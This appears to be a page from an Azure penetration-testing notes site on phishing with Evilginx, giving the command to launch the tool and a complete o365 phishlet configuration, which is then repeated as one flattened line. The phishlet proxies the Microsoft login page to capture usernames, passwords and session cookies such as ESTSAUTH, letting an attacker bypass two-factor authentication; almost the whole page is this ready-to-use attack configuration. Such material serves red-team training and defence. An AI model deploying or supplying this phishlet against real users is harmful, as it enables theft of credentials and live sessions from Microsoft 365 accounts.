Phishing with Evilginx

Evilginx is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.

Start in developer mode:

C:\AzAD\Tools\evilginx-v3.3.0\evilginx.exe -p C:\AzAD\Tools\evilginx-v3.3.0\phishlets\ -developer

Phishlet o365

name: 'o365'
author: '@jamescullum'
min_ver: '3.3.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
  # The lines below are needed if your target organization utilizes ADFS.
  # If they do, you need to uncomment all following lines that contain <...>
  # To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
  # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
  #    <insert-adfs-subdomain> = adfs
  #    <insert-adfs-host> = example.com
  #    <insert-adfs-subdomain-and-host> = adfs.example.com
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
  #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
  # Uncomment and fill in if your target organization utilizes ADFS
  #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_urls:
  - '/kmsi*'
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie','CCState']
  #- domain: 'webshell.suite.office.com'
  #  keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie','CCState']
credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd|Password)'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/'

Use this extension to parse the json formatter cookie from evilginx to your browser:

PreviousAzure Blob Storage NextConditional Access

Last updated 7 days ago

name: 'o365' author: '@jamescullum' min_ver: '3.3.0' proxy_hosts: - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: false, is_landing: true} - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false} # The lines below are needed if your target organization utilizes ADFS. # If they do, you need to uncomment all following lines that contain <...> # To get the correct ADFS subdomain, test the web login manually and check where you are redirected. # Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed: # <insert-adfs-subdomain> = adfs # <insert-adfs-host> = example.com # <insert-adfs-subdomain-and-host> = adfs.example.com #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false} #- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false} sub_filters: - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true} # Uncomment and fill in if your target organization utilizes ADFS #- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} auth_urls: - '/kmsi*' auth_tokens: - domain: '.login.microsoftonline.com' keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie','CCState'] #- domain: 'webshell.suite.office.com' # keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie','CCState'] credentials: username: key: '(login|UserName)' search: '(.*)' type: 'post' password: key: '(passwd|Password)' search: '(.*)' type: 'post' login: domain: 'login.microsoftonline.com' path: '/'